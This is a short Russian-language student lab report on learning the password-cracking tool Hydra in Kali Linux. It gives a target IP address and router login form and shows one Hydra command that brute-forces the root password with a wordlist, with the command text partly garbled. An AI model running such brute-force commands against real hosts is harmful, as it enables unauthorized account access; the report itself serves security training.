## Индивидуальный проект 3

Использование Hydra

Панченко Денис Дмитриевич

## Содержание

1	Цель работы	3
2	Задание	4
3	Выполнение лабораторной работы	5
4	Вывод	6

# 1 Цель работы

Научиться пользоваться Hydra в системе Kali Linux.

## 2 Задание

Научиться пользоваться Hydra в системе Kali Linux.

#### 3 Выполнение лабораторной работы

Hydra используется для подбора или взлома имени пользователя и пароля. Поддерживает подбор для большого набора приложений.

Исходные данные: IP сервера 178.72.90.181; Сервис http на стандартном 80 порту; Для авторизации используется html форма, которая отправляет по адресу http://178.72.90.181/cgi-bin/luci методом POST запрос вида username=root&password=test\_password;

Выполняем запрос к Hydra (рис. 1).

```
ddpanchenko@root:~

File Actions Edit View Help

(ddpanchenko@root)-[~]

$ hydra -l root -P ~/pass_lists/dedik_passes.txt -o ./hydra_result.log -f -
V -s 80 178.72.90.181 http-post-form "/cgi-bin/luci:username=^U5ER^6password=
^PASS^:Invalid username"
```

Рис. 3.1: Запрос к Hydra

#### 4 Вывод

Я научился использовать Hydra в Kali Linux.